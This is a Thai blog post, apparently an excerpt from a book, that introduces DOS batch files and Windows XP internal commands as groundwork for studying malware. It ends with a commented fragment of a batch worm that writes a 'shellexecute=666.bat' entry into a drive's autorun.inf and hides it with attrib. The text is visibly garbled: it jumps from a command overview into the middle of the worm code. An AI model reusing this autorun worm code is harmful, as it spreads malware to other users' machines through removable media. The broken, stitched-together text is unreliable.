กรณีศึกษาเพื่อทำความเข้าใจเกี่ยวกับคำสั่งไวรัส
1. หนอนและไวรัสแบทช์ไฟล์
เจาะลึก DOS Batch File (ปูพื้นฐานการศึกษามัลแวร์)
Batch File คืออะไร...มันคือชุดคำสั่งที่รวบรวมคำสั่งบน Command Line (หรือคำสั่งบน หน้าต่าง Cmd ของ วินโดวส์ XP) ซึ่งในอดีต...DOS สร้างขึ้นมาเพื่อเป็นเมนูลัดบนระบบปฏิบัติการรุ่นโบราณที่ทำงานอยู่บน "คอนโซล(แป้นพิมพ์และจอภาพ)" เช่นการ CD \DOS คือการเข้าไปยัง Directory DOS หากจะพิมพ์ข้อความเหล่านั้นทั้งหมด...บ่อยๆ ครั้ง จะทำให้เสียเวลา DOS จึงให้สามารถนำคำสั่งที่ใช้บ่อยๆ มาบันทึกเป็นแฟ้มข้อความที่มีนามสกุล .BAT เพื่อให้สามารถพิมพ์ชื่อแฟ้ม .BAT นั้นและตามด้วย Enter ก็สามารถเรียกใช้คำสั่งทั้งหมดในนั้นได้คำสั่งเพียงคำสั่งเดียวคุณเองจำมัน ได้ จะกลายเป็นเส้นทางลัดและคำสั่งแบบซับซ้อน
ซึ่งตัวของ Batch File เองสามารถทำงานอะไรได้บ้าง...โอย...มันทำงานได้มากจนคุณเองคาดไม่ถึงเลย... ตั้งแต่การล็อกระบบ, ตรวจสอบข้อมูล Error หรือ, เขียนไวรัส...(อันสุดท้ายนี้ไม่ค่อยชอบนะแต่คุ้นเคย) และผู้อ่านที่บางคนไม่เคยแตะ...DOS มาก่อนจะศึกษาได้หรือเปล่า...ได้ครับ...แต่ต้องมีพื้นฐานต้องหาอ่านกันหน่อย ในหนังสือเล่มนี้จะอธิบายเฉพาะคำสั่งที่สำคัญๆ เท่านั้น...เพราะเกรงว่าถ้าอธิบายทุกๆ คำสั่งของ DOS เนื้อหาของหนังสือจะไม่พอครับ...
เอาล่ะ...ปูพื้นกันใหม่ด้วย DOS บนวินโดวส์เอ็กซ์พี...
DOS ที่ทำงานบนวินโดวส์ 32 บิต มันจะขยายการทำงานของ Environment Memory ที่คุณใช้กำหนดตัวแปรด้วยคำสั่ง SET และมันก็ทำงานร่วมกับชื่อแฟ้มข้อมูลที่มีขนาดยาวๆ ได้สบาย รวมถึงบรรจุคำสั่งภายใน (Internal Command) เอาไว้ในระบบวินโดวส์ ครับ...เป็นผลให้ตำรา DOS ที่คุณเคยเปิดอ่าน...เก็บมันใส่ลังได้เลยเพราะคำสั่งใหม่ๆ เพิ่มเข้ามาเพียบ...ผมเองก็นำมาสอนได้ไม่ทุกคำสั่งครับ...แต่มีรายชื่อคำ สั่งภายใน (Internal Command) ให้คุณดูเล่นๆ ดังนี้ ASSOC, AT, ATTRIB, BREAK, CACLS, CALL, CD, CHCP, CHDIR, CHKDSK,CHKNTFS, CLS, CMD, COLOR, COMP, COMPACT, CONVERT, COPY, DATE,DEL, DIR, DISKCOMP, DISKCOPY, DOSKEY, ECHO, ENDLOCAL, ERASE,EXIT, FC, FIND, FINDSTR, FOR, FORMAT, FTYPE, GOTO, GRAFTABL,HELP, IF, LABEL, MD, MKDIR, MODE, MORE, MOVE, PATH, PAUSE, POPD, PRINT, PROMPT, PUSHD, RD, RECOVER, REM, REN, RENAME, REPLACE,RMDIR, SET, SETLOCAL, SHIFT, SORT, START, SUBST, TIME, TITLE, TREE, TYPE, VER, VERIFY, VOL, XCOPY นี้คือคำสั่งที่สามารถทำงานได้ทุกเวลาที่ วินโดวส์ทำงานครับ ไม่เหมือนกับ (External Command) เช่น EDIT.EXE, FDISK.EXE ซึ่งไวรัสเองสามารถลบแฟ้มคำสั่งเหล่านั้นทิ้ง ส่งผลให้ใช้คำสั่งนั้นไม่ได้ ตัวอย่างคือถ้าไวรัสลบแฟ้ม REG.EXE ทิ้งไปซะ จะทำให้ไม่สามารถแก้ไขระบบรีจีสตรีย์ ของวินโดวส์ได้ใน DOS Command และถ้าไวรัสลบแฟ้ม REGEDIT.EXE, REGEDIT32.EXE ทิ้งไปอีก ก็ไม่สามารถเข้ารีจีสตรีย์ ในวินโดวส์ได้เลย ทำให้การฆ่าไวรัสยากขึ้นอีกมาก อย่างไรก็ดี คุณรู้แล้วควรสำรองแฟ้มเหล่านี้เก็บเอาไว้เพื่อไม่ให้ถูกเล่นงานจากไวรัสแบบ เซียน
คำสั่งบน DOS นั้น ประกอบด้วย...
[คำสั้งDOS]autorun] ไปยังแฟ้ม Autorun.inf เพื่อสร้างคำสั่งหนอน
echo shellexecute=666.bat >>%1:\autorun.inf
:: ส่งข้อความต่อท้ายในอีกบรรทัด shellexcute=666.bat เพื่อเรียกหนอนทำงานเมื่อ Autorun
attrib +s +h +r %1:\autorun.inf > nul
:: กำหนดให้แฟ้ม Autorun.inf เป็นแฟ้มระบบและซ่อนตัวและห้ามเขียน
:endbat
:: สิ้นสุดคำสั่งหนอน
Credit THD
ไม่มีความคิดเห็น:
แสดงความคิดเห็น